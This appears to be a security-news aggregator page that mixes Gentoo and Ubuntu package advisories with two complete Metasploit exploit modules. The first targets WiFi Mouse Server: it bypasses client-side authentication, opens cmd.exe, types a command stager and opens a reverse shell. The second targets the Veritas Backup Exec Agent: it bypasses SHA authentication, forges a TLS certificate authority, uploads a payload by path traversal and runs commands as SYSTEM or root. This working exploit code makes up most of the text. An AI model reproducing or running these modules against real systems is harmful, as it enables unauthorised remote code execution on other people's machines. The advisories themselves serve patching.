Gentoo Linux Security Advisory 202209-15 - Multiple vulnerabilities have been found in Oracle JDK and JRE, the worst of which could result in the arbitrary execution of code. Versions less than or equal to 11.0.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Oracle JDK/JRE: Multiple vulnerabilities  
     Date: September 25, 2022  
     Bugs: #732630, #717638  
       ID: 202209-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Oracle JDK and JRE, the  
worst of which could result in the arbitrary execution of code.

Background  
==========

Java Platform, Standard Edition (Java SE) lets you develop and deploy  
Java applications on desktops and servers, as well as in today's  
demanding embedded environments. Java offers the rich user interface,  
performance, versatility, portability, and security that today's  
applications require.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-java/oracle-jdk-bin    <= 11.0.2                 Vulnerable!  
  2  dev-java/oracle-jre-bin    <= 1.8.0.202              Vulnerable!

Description  
===========

Multiple vulnerabilities have been discovered in Oracle's JDK and JRE  
software suites. Please review the CVE identifiers referenced below for  
details.

Impact  
======

Certain uses of untrusted data by Oracle JDK and JRE could result in  
arbitrary code execution.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

Gentoo has discontinued support for the Oracle JDK and JRE. We recommend  
that users remove it, and use dev-java/openjdk, dev-java/openjdk-bin, or  
dev-java/openjdk-jre-bin instead:

  # emerge --ask --depclean "dev-java/oracle-jre-bin"  
  # emerge --ask --depclean "dev-java/oracle-jdk-bin"

References  
==========

[ 1 ] CVE-2020-2585  
      https://nvd.nist.gov/vuln/detail/CVE-2020-2585  
[ 2 ] CVE-2020-2755  
      https://nvd.nist.gov/vuln/detail/CVE-2020-2755  
[ 3 ] CVE-2020-2756  
      https://nvd.nist.gov/vuln/detail/CVE-2020-2756  
[ 4 ] CVE-2020-2757  
      https://nvd.nist.gov/vuln/detail/CVE-2020-2757  
[ 5 ] CVE-2020-2773  
      https://nvd.nist.gov/vuln/detail/CVE-2020-2773  
[ 6 ] CVE-2020-2781  
      https://nvd.nist.gov/vuln/detail/CVE-2020-2781  
[ 7 ] CVE-2020-2800  
      https://nvd.nist.gov/vuln/detail/CVE-2020-2800  
[ 8 ] CVE-2020-2803  
      https://nvd.nist.gov/vuln/detail/CVE-2020-2803  
[ 9 ] CVE-2020-2805  
      https://nvd.nist.gov/vuln/detail/CVE-2020-2805  
[ 10 ] CVE-2020-14556  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14556  
[ 11 ] CVE-2020-14562  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14562  
[ 12 ] CVE-2020-14573  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14573  
[ 13 ] CVE-2020-14577  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14577  
[ 14 ] CVE-2020-14578  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14578  
[ 15 ] CVE-2020-14579  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14579  
[ 16 ] CVE-2020-14581  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14581  
[ 17 ] CVE-2020-14583  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14583  
[ 18 ] CVE-2020-14593  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14593  
[ 19 ] CVE-2020-14621  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14621  
[ 20 ] CVE-2020-14664  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14664

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-15

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-15

OpenStego is a tool implemented in Java for generic steganography, with support for password-based encryption of the data. It supports plugins for various steganographic algorithms (currently, only Least Significant Bit algorithm is supported for images).

OpenStego Free Steganography Solution 0.8.5

GNUnet is a peer-to-peer framework with focus on providing security. All peer-to-peer messages in the network are confidential and authenticated. The framework provides a transport abstraction layer and can currently encapsulate the network traffic in UDP (IPv4 and IPv6), TCP (IPv4 and IPv6), HTTP, or SMTP messages. GNUnet supports accounting to provide contributing nodes with better service. The primary service build on top of the framework is anonymous file sharing.

GNUnet P2P Framework 0.17.6

Ubuntu Security Notice 5636-1 - It was discovered that SoS incorrectly handled certain data. An attacker could possibly use this issue to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-5636-1  
September 26, 2022

sosreport vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

SoS could be made do expose sensitive information.

Software Description:  
- sosreport: Set of tools to gather troubleshooting data from a system

Details:

It was discovered that SoS incorrectly handled certain data.  
An attacker could possibly use this issue to expose sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  sosreport                       4.3-1ubuntu2.1

Ubuntu 20.04 LTS:  
  sosreport                       4.3-1ubuntu0.20.04.2

Ubuntu 18.04 LTS:  
  sosreport                       4.3-1ubuntu0.18.04.2

Ubuntu 16.04 ESM:  
  sosreport                       3.9.1-1ubuntu0.16.04.2+esm1

Ubuntu 14.04 ESM:  
  sosreport                       3.5-1~ubuntu14.04.3+esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5636-1  
  CVE-2022-2806

Package Information:  
  https://launchpad.net/ubuntu/+source/sosreport/4.3-1ubuntu2.1  
  https://launchpad.net/ubuntu/+source/sosreport/4.3-1ubuntu0.20.04.2  
  https://launchpad.net/ubuntu/+source/sosreport/4.3-1ubuntu0.18.04.2

Ubuntu Security Notice USN-5636-1

The WiFi Mouse (Mouse Server) from Necta LLC contains an authentication bypass as the authentication is completely implemented entirely on the client side. By utilizing this vulnerability, is possible to open a program on the server (cmd.exe in our case) and type commands that will be executed as the user running WiFi Mouse (Mouse Server), resulting in remote code execution. Tested against versions 1.8.3.4 (current as of module writing) and 1.8.2.3.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  include Exploit::Remote::Tcp  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Wifi Mouse RCE',        'Description' => %q{          The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the          authentication is completely implemented entirely on the client side. By utilizing          this vulnerability, is possible to open a program on the server          (cmd.exe in our case) and type commands that will be executed as the user running          WiFi Mouse (Mouse Server), resulting in remote code execution.          Tested against versions 1.8.3.4 (current as of module writing) and          1.8.2.3.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'REDHATAUGUST', # edb          'H4RK3NZ0' # edb, original discovery        ],        'References' => [          [ 'EDB', '50972' ],          [ 'EDB', '49601' ],          [ 'CVE', '2022-3218' ],          [ 'URL', 'http://wifimouse.necta.us/' ],          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/wifi%20mouse/wifi-mouse-server-rce.py' ]        ],        'Arch' => [ ARCH_X64, ARCH_X86 ],        'Platform' => 'win',        'Targets' => [          [            'stager',            {              'CmdStagerFlavor' => ['psh_invokewebrequest', 'certutil']            }          ],        ],        'Payload' => {          'BadChars' => "\x0a\x00"        },        'DefaultOptions' => {          # since this may get typed out ON SCREEN we want as small a payload as possible          'PAYLOAD' => 'windows/shell/reverse_tcp'        },        'DisclosureDate' => '2021-02-25',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [CRASH_SERVICE_DOWN],          'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # typing on screen        }      )    )    register_options(      [        OptPort.new('RPORT', [true, 'Port WiFi Mouse Mouse Server runs on', 1978]),        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),        OptInt.new('LINEMAX', [true, 'Maximum length of lines to send for stager method.  Smaller for more unstable connections.', 1_020]),      ]    )  end  def send_return    sock.put('key  3RTN') # what the mobile app sends  end  def send_command(command)    sock.put("utf8 #{command}\x0A")    sleep(datastore['SLEEP'])    send_return  end  def open_file(file)    file = "/#{file}".gsub('\\', '/').gsub(':', '')    sock.put("openfile #{file}\x0A")  end  def exploit    connect    print_status('Opening command prompt')    open_file('C:\\Windows\\System32\\cmd.exe')    sleep(datastore['SLEEP']) # give time for it to open    print_status('Typing out payload')    execute_cmdstager({ linemax: datastore['LINEMAX'], delay: datastore['SLEEP'] })    handler  end  def execute_command(cmd, _opts = {})    send_command(cmd)  endend

WiFi Mouse 1.8.3.4 Remote Code Execution

Veritas Backup Exec Agent supports multiple authentication schemes and SHA authentication is one of them. This authentication scheme is no longer used within Backup Exec versions, but had not yet been disabled. An attacker could remotely exploit the SHA authentication scheme to gain unauthorized access to the BE Agent and execute an arbitrary OS command on the host with NT AUTHORITY\SYSTEM or root privileges depending on the platform. The vulnerability presents in 16.x, 20.x and 21.x versions of Backup Exec up to 21.2 (or up to and including Backup Exec Remote Agent revision 9.3).

    # frozen_string_literal: true### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::Tcp  include Msf::Exploit::Remote::NDMPSocket  include Msf::Exploit::CmdStager  include Msf::Exploit::EXE  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Veritas Backup Exec Agent Remote Code Execution',        'Description' => %q{          Veritas Backup Exec Agent supports multiple authentication schemes and SHA authentication is one of them.          This authentication scheme is no longer used within Backup Exec versions, but hadn’t yet been disabled.          An attacker could remotely exploit the SHA authentication scheme to gain unauthorized access to          the BE Agent and execute an arbitrary OS command on the host with NT AUTHORITY\SYSTEM or root privileges          depending on the platform.          The vulnerability presents in 16.x, 20.x and 21.x versions of Backup Exec up to 21.2 (or up to and          including Backup Exec Remote Agent revision 9.3)        },        'License' => MSF_LICENSE,        'Author' => ['Alexander Korotin <0xc0rs[at]gmail.com>'],        'References' => [          ['CVE', '2021-27876'],          ['CVE', '2021-27877'],          ['CVE', '2021-27878'],          ['URL', 'https://www.veritas.com/content/support/en_US/security/VTS21-001']        ],        'Platform' => %w[win linux],        'Targets' => [          [            'Windows',            {              'Platform' => 'win',              'Arch' => [ARCH_X86, ARCH_X64],              'CmdStagerFlavor' => %w[certutil vbs psh_invokewebrequest debug_write debug_asm]            }          ],          [            'Linux',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'CmdStagerFlavor' => %w[bourne wget curl echo]            }          ]        ],        'DefaultOptions' => {          'RPORT' => 10_000        },        'Privileged' => true,        'DisclosureDate' => '2021-03-01',        'DefaultTarget' => 0,        'Notes' => {          'Reliability' => [UNRELIABLE_SESSION],          'Stability' => [CRASH_SAFE],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('SHELL', [true, 'The shell for executing OS command', '/bin/bash'],                    conditions: ['TARGET', '==', 'Linux'])    ])    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')  end  def execute_command(cmd, opts = {})    case target.opts['Platform']    when 'win'      wrap_cmd = "C:\\Windows\\System32\\cmd.exe /c \"#{cmd}\""    when 'linux'      wrap_cmd = "#{datastore['SHELL']} -c \"#{cmd}\""    end    ndmp_sock = opts[:ndmp_sock]    ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_EXECUTE_COMMAND,        NdmpExecuteCommandReq.new({ cmd: wrap_cmd, unknown: 0 }).to_xdr      )    )  end  def exploit    print_status('Exploiting ...')    ndmp_status, ndmp_sock, msg_fail_reason = ndmp_connect    fail_with(Msf::Module::Failure::NotFound, "Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status    ndmp_status, msg_fail_reason = tls_enabling(ndmp_sock)    fail_with(Msf::Module::Failure::UnexpectedReply, "Can not establish TLS connection. #{msg_fail_reason}") unless ndmp_status    ndmp_status, msg_fail_reason = sha_authentication(ndmp_sock)    fail_with(Msf::Module::Failure::NotVulnerable, "Can not authenticate with SHA. #{msg_fail_reason}") unless ndmp_status    if target.opts['Platform'] == 'win'      filename = "#{rand_text_alpha(8)}.exe"      ndmp_status, msg_fail_reason = win_write_upload(ndmp_sock, filename)      if ndmp_status        ndmp_status, msg_fail_reason = exec_win_command(ndmp_sock, filename)        fail_with(Msf::Module::Failure::PayloadFailed, "Can not execute payload. #{msg_fail_reason}") unless ndmp_status      else        print_status('Can not upload payload with NDMP_FILE_WRITE packet. Trying to upload with CmdStager')        execute_cmdstager({ ndmp_sock: ndmp_sock, linemax: 512 })      end    else      print_status('Uploading payload with CmdStager')      execute_cmdstager({ ndmp_sock: ndmp_sock, linemax: 512 })    end  end  def check    print_status('Checking vulnerability')    ndmp_status, ndmp_sock, msg_fail_reason = ndmp_connect    return Exploit::CheckCode::Unknown("Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status    print_status('Getting supported authentication types')    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(NDMP::Message::CONFIG_GET_SERVER_INFO)    )    ndmp_payload = NdmpConfigGetServerInfoRes.from_xdr(ndmp_msg.body)    print_status("Supported authentication by BE agent: #{ndmp_payload.auth_types.map do |k, _|                                                          "#{AUTH_TYPES[k]} (#{k})"                                                        end.join(', ')}")    print_status("BE agent revision: #{ndmp_payload.revision}")    if ndmp_payload.auth_types.include?(5)      Exploit::CheckCode::Appears('SHA authentication is enabled')    else      Exploit::CheckCode::Safe('SHA authentication is disabled')    end  end  def ndmp_connect    print_status('Connecting to BE Agent service')    ndmp_msg = nil    begin      ndmp_sock = NDMP::Socket.new(connect)    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout,           Rex::ConnectionRefused => e      return [false, nil, e.to_s]    end    begin      Timeout.timeout(datastore['ConnectTimeout']) do        ndmp_msg = ndmp_sock.read_ndmp_msg(NDMP::Message::NOTIFY_CONNECTED)      end    rescue Timeout::Error      return [false, nil, 'No NDMP_NOTIFY_CONNECTED (0x502) packet from BE Agent service']    else      ndmp_payload = NdmpNotifyConnectedRes.from_xdr(ndmp_msg.body)    end    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP::Message::CONNECT_OPEN,        NdmpConnectOpenReq.new({ version: ndmp_payload.version }).to_xdr      )    )    ndmp_payload = NdmpConnectOpenRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, ndmp_sock, "Error code of NDMP_CONNECT_OPEN (0x900) packet: #{ndmp_payload.err_code}"]    end    [true, ndmp_sock, nil]  end  def tls_enabling(ndmp_sock)    print_status('Enabling TLS for NDMP connection')    ndmp_tls_certs = NdmpTlsCerts.new('VeritasBE', datastore['RHOSTS'].to_s)    ndmp_tls_certs.forge_ca    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_SSL_HANDSHAKE,        NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_REQ])).to_xdr      )    )    ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of SSL_HANDSHAKE_CSR_REQ (2) packet: #{ndmp_payload.err_code}"]    end    ndmp_tls_certs.sign_agent_csr(ndmp_payload.data)    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_SSL_HANDSHAKE,        NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_SIGNED])).to_xdr      )    )    ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of SSL_HANDSHAKE_CSR_SIGNED (3) packet: #{ndmp_payload.err_code}"]    end    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_SSL_HANDSHAKE,        NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CONNECT])).to_xdr      )    )    ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of SSL_HANDSHAKE_CONNECT (4) packet: #{ndmp_payload.err_code}"]    end    ssl_context = OpenSSL::SSL::SSLContext.new    ssl_context.add_certificate(ndmp_tls_certs.ca_cert, ndmp_tls_certs.ca_key)    ndmp_sock.wrap_with_ssl(ssl_context)    [true, nil]  end  def sha_authentication(ndmp_sock)    print_status('Passing SHA authentication')    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_CONFIG_GET_AUTH_ATTR,        NdmpConfigGetAuthAttrReq.new({ auth_type: 5 }).to_xdr      )    )    ndmp_payload = NdmpConfigGetAuthAttrRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of NDMP_CONFIG_GET_AUTH_ATTR (0x103) packet: #{ndmp_payload.err_code}"]    end    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP::Message::CONNECT_CLIENT_AUTH,        NdmpConnectClientAuthReq.new(          {            auth_type: 5,            username: 'Administrator', # Doesn't metter            hash: Digest::SHA256.digest("\x00" * 64 + ndmp_payload.challenge)          }        ).to_xdr      )    )    ndmp_payload = NdmpConnectClientAuthRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of NDMP_CONECT_CLIENT_AUTH (0x901) packet: #{ndmp_payload.err_code}"]    end    [true, nil]  end  def win_write_upload(ndmp_sock, filename)    print_status('Uploading payload with NDMP_FILE_WRITE packet')    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_FILE_OPEN_EXT,        NdmpFileOpenExtReq.new(          {            filename: filename,            dir: '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\Temp',            mode: 4          }        ).to_xdr      )    )    ndmp_payload = NdmpFileOpenExtRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of NDMP_FILE_OPEN_EXT (0xf308) packet: #{ndmp_payload.err_code}"]    end    hnd = ndmp_payload.handler    exe = generate_payload_exe    offset = 0    block_size = 2048    while offset < exe.length      ndmp_msg = ndmp_sock.do_request_response(        NDMP::Message.new_request(          NDMP_FILE_WRITE,          NdmpFileWriteReq.new({ handler: hnd, len: block_size, data: exe[offset, block_size] }).to_xdr        )      )      ndmp_payload = NdmpFileWriteRes.from_xdr(ndmp_msg.body)      unless ndmp_payload.err_code.zero?        return [false, "Error code of NDMP_FILE_WRITE (0xF309) packet: #{ndmp_payload.err_code}"]      end      offset += block_size    end    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_FILE_CLOSE,        NdmpFileCloseReq.new({ handler: hnd }).to_xdr      )    )    ndmp_payload = NdmpFileCloseRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of NDMP_FILE_CLOSE (0xF306) packet: #{ndmp_payload.err_code}"]    end    [true, nil]  end  def exec_win_command(ndmp_sock, filename)    cmd = "C:\\Windows\\System32\\cmd.exe /c \"C:\\Windows\\Temp\\#{filename}\""    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_EXECUTE_COMMAND,        NdmpExecuteCommandReq.new({ cmd: cmd, unknown: 0 }).to_xdr      )    )    ndmp_payload = NdmpExecuteCommandRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of NDMP_EXECUTE_COMMAND (0xF30F) packet: #{ndmp_payload.err_code}"]    end    [true, nil]  end  # Class to create CA and client certificates  class NdmpTlsCerts    def initialize(hostname, ip)      @hostname = hostname      @ip = ip      @ca_key = nil      @ca_cert = nil      @be_agent_cert = nil    end    SSL_HANDSHAKE_TYPES = {      SSL_HANDSHAKE_TEST_CERT: 1,      SSL_HANDSHAKE_CSR_REQ: 2,      SSL_HANDSHAKE_CSR_SIGNED: 3,      SSL_HANDSHAKE_CONNECT: 4    }.freeze    attr_reader :ca_cert, :ca_key    def forge_ca      @ca_key = OpenSSL::PKey::RSA.new(2048)      @ca_cert = OpenSSL::X509::Certificate.new      @ca_cert.version = 2      @ca_cert.serial = rand(2**32..2**64 - 1)      @ca_cert.subject = @ca_cert.issuer = OpenSSL::X509::Name.parse("/CN=#{@hostname}")      extn_factory = OpenSSL::X509::ExtensionFactory.new(@ca_cert, @ca_cert)      @ca_cert.extensions = [        extn_factory.create_extension('subjectKeyIdentifier', 'hash'),        extn_factory.create_extension('basicConstraints', 'CA:TRUE'),        extn_factory.create_extension('keyUsage', 'keyCertSign, cRLSign')      ]      @ca_cert.add_extension(extn_factory.create_extension('authorityKeyIdentifier', 'keyid:always'))      @ca_cert.public_key = @ca_key.public_key      @ca_cert.not_before = Time.now - 7 * 60 * 60 * 24      @ca_cert.not_after = Time.now + 14 * 24 * 60 * 60      @ca_cert.sign(@ca_key, OpenSSL::Digest.new('SHA256'))    end    def sign_agent_csr(csr)      o_csr = OpenSSL::X509::Request.new(csr)      @be_agent_cert = OpenSSL::X509::Certificate.new      @be_agent_cert.version = 2      @be_agent_cert.serial = rand(2**32..2**64 - 1)      @be_agent_cert.not_before = Time.now - 7 * 60 * 60 * 24      @be_agent_cert.not_after = Time.now + 14 * 24 * 60 * 60      @be_agent_cert.issuer = @ca_cert.subject      @be_agent_cert.subject = o_csr.subject      @be_agent_cert.public_key = o_csr.public_key      @be_agent_cert.sign(@ca_key, OpenSSL::Digest.new('SHA256'))    end    def default_sslpacket_content(ssl_packet_type)      if ssl_packet_type == SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_SIGNED]        ca_cert = @ca_cert.to_s        agent_cert = @be_agent_cert.to_s      else        ca_cert = ''        agent_cert = ''      end      {        ssl_packet_type: ssl_packet_type,        hostname: @hostname,        nb_hostname: @hostname.upcase,        ip_addr: @ip,        cert_id1: get_cert_id(@ca_cert),        cert_id2: get_cert_id(@ca_cert),        unknown1: 0,        unknown2: 0,        ca_cert_len: ca_cert.length,        ca_cert: ca_cert,        agent_cert_len: agent_cert.length,        agent_cert: agent_cert      }    end    def get_cert_id(cert)      Digest::SHA1.digest(cert.issuer.to_s + cert.serial.to_s(2))[0...4].unpack1('L<')    end  end  NDMP_CONFIG_GET_AUTH_ATTR = 0x103  NDMP_SSL_HANDSHAKE = 0xf383  NDMP_EXECUTE_COMMAND = 0xf30f  NDMP_FILE_OPEN_EXT = 0xf308  NDMP_FILE_WRITE = 0xF309  NDMP_FILE_CLOSE = 0xF306  AUTH_TYPES = {    1 => 'Text',    2 => 'MD5',    3 => 'BEWS',    4 => 'SSPI',    5 => 'SHA',    190 => 'BEWS2' # 0xBE  }.freeze  # Responce packets  class NdmpNotifyConnectedRes < XDR::Struct    attribute :connected, XDR::Int    attribute :version, XDR::Int    attribute :reason, XDR::Int  end  class NdmpConnectOpenRes < XDR::Struct    attribute :err_code, XDR::Int  end  class NdmpConfigGetServerInfoRes < XDR::Struct    attribute :err_code, XDR::Int    attribute :vendor_name, XDR::String[]    attribute :product_name, XDR::String[]    attribute :revision, XDR::String[]    attribute :auth_types, XDR::VarArray[XDR::Int]  end  class NdmpConfigGetHostInfoRes < XDR::Struct    attribute :err_code, XDR::Int    attribute :hostname, XDR::String[]    attribute :os, XDR::String[]    attribute :os_info, XDR::String[]    attribute :ip, XDR::String[]  end  class NdmpSslHandshakeRes < XDR::Struct    attribute :data_len, XDR::Int    attribute :data, XDR::String[]    attribute :err_code, XDR::Int    attribute :unknown4, XDR::String[]  end  class NdmpConfigGetAuthAttrRes < XDR::Struct    attribute :err_code, XDR::Int    attribute :auth_type, XDR::Int    attribute :challenge, XDR::Opaque[64]  end  class NdmpConnectClientAuthRes < XDR::Struct    attribute :err_code, XDR::Int  end  class NdmpExecuteCommandRes < XDR::Struct    attribute :err_code, XDR::Int  end  class NdmpFileOpenExtRes < XDR::Struct    attribute :err_code, XDR::Int    attribute :handler, XDR::Int  end  class NdmpFileWriteRes < XDR::Struct    attribute :err_code, XDR::Int    attribute :recv_len, XDR::Int    attribute :unknown, XDR::Int  end  class NdmpFileCloseRes < XDR::Struct    attribute :err_code, XDR::Int  end  # Request packets  class NdmpConnectOpenReq < XDR::Struct    attribute :version, XDR::Int  end  class NdmpSslHandshakeReq < XDR::Struct    attribute :ssl_packet_type, XDR::Int    attribute :nb_hostname, XDR::String[]    attribute :hostname, XDR::String[]    attribute :ip_addr, XDR::String[]    attribute :cert_id1, XDR::Int    attribute :cert_id2, XDR::Int    attribute :unknown1, XDR::Int    attribute :unknown2, XDR::Int    attribute :ca_cert_len, XDR::Int    attribute :ca_cert, XDR::String[]    attribute :agent_cert_len, XDR::Int    attribute :agent_cert, XDR::String[]  end  class NdmpConfigGetAuthAttrReq < XDR::Struct    attribute :auth_type, XDR::Int  end  class NdmpConnectClientAuthReq < XDR::Struct    attribute :auth_type, XDR::Int    attribute :username, XDR::String[]    attribute :hash, XDR::Opaque[32]  end  class NdmpExecuteCommandReq < XDR::Struct    attribute :cmd, XDR::String[]    attribute :unknown, XDR::Int  end  class NdmpFileOpenExtReq < XDR::Struct    attribute :filename, XDR::String[]    attribute :dir, XDR::String[]    attribute :mode, XDR::Int  end  class NdmpFileWriteReq < XDR::Struct    attribute :handler, XDR::Int    attribute :len, XDR::Int    attribute :data, XDR::String[]  end  class NdmpFileCloseReq < XDR::Struct    attribute :handler, XDR::Int  endend

Veritas Backup Exec Agent Remote Code Execution

Gentoo Linux Security Advisory 202209-14 - Multiple vulnerabilities have been discovered in Fetchmail, the worst of which could result in email disclosure to third parties. Versions less than 6.4.22 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-14  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Fetchmail: Multiple Vulnerabilities  
     Date: September 25, 2022  
     Bugs: #810676, #804921  
       ID: 202209-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Fetchmail, the worst of  
which could result in email disclosure to third parties.

Background  
==========

Fetchmail is a remote mail retrieval and forwarding utility.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  net-mail/fetchmail         < 6.4.22                    >= 6.4.22

Description  
===========

Multiple vulnerabilities have been discovered in Fetchmail. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Fetchmail users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-mail/fetchmail-6.4.22"

References  
==========

[ 1 ] CVE-2021-36386  
      https://nvd.nist.gov/vuln/detail/CVE-2021-36386  
[ 2 ] CVE-2021-39272  
      https://nvd.nist.gov/vuln/detail/CVE-2021-39272

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-14

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-14

Backdoor.Win32.Augudor.b malware suffers from a code execution vulnerability.

